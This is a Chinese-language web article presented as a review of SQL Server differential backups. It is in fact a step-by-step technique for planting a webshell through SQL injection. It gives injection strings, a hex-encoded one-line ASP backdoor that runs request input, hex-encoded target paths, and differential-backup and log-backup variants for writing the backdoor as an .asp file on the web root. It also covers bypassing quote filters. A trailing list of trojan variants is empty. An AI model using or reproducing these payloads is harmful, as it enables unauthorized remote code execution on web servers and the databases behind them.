复习一下sql server的差异备份
更新时间:2007年03月08日 00:00:00 作者:
MSSQL差异备份,就是和前一次备份作对比,把不一样的内容备份下来,这样,只要前一次备份后,插入新的内容,差异备份就可以把刚插入的内容备份出来,而这个备份文件将大大减少,得到webShell的成功也提高了不少!
差异备份的流程大概这样:
1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--
2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
上面
0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容:
如下是网上常见的差异备份代码,思路一样!
===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT
0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
声明:方法不是我想的,我只是写工具,默认得到shell是
===============================================================
我发现上面代码,有时会无效,而直接用
backup database 库名 to disk = 'c:\ddd.bak'
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
却可以成功,所以把最原始的方法写出来!思路是前人所创,这不说大家也知道的!
库名 必须要有效的库名,一般注入工具都可以得到!如果某站过滤 "‘",就要把字符内容转为数值了!
网上还有log增量备份的,我也把他记录一下
=====================================================
另一种log增量备份技术:
';alter database null set RECOVERY FULL--
';create table cmd (a image)--
';backup log null to disk = 'f:\cmd' with init--
';insert into cmd (a) values (0x3C2565786563757465287265717565737428226122292
9253EDA)--
';backup log null to disk = '备份路径'--
PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的
说到一句话马,还可以有这么几种写法:
a).
b).
c).%>
d).
e).
相关文章
都是sql中一些比较实用的sql语句,需要的朋友可以收藏下,方便以后使用。2011-10-10
在sqlserver中比较常见的关键字有很多,下面小编主要给大家介绍sql server关键字详解,需要了解的朋友可以一起来学习2015-08-08
SQL查询连续号码段的巧妙解法...2007-04-04
Merge关键字是一个神奇的DML关键字。它在SQL Server 2008被引入,它能将Insert,Update,Delete简单的并为一句。通过本篇文章给大家介绍sqlserver中merge函数用法详解,感兴趣的朋友一起学习吧2015-11-11
众所周知,在M$sql中有个绝对是网络安全中的隐患的帐号sa,系统管理员 (sa),默认情况下,它指派给固定服务器角色 sysadmin,并不能进行更改。2008-03-03
将查询的结果放到一个新表中去,查询结果可以来源于一个表或多个表。2010-06-06
本文是小编日常收集整理SqlServer数据库优化经验和注意事项,详细介绍了SQL语句优化的基本原则,包括索引、查询和游标的使用等2015-11-11
本篇文章介绍了,SQL Server的基本功能性语句。需要的朋友参考下2013-04-04
这篇文章主要介绍了VS2015安装之后加装SQL SERVER2014详细步骤,具有一定的参考价值,感兴趣的小伙伴们可以参考一下2016-12-12
此文章主要向大家讲述的是非动态SQL ServerSQL语句执行动态查询,在实际操作中我尝试在一个存储过程中,来进行传递一系列以逗号划定界限的值,来对结果集进行限制。但是无论什么时候,我在IN子句中使用变量,都会得到错误信息2017-06-06
最新评论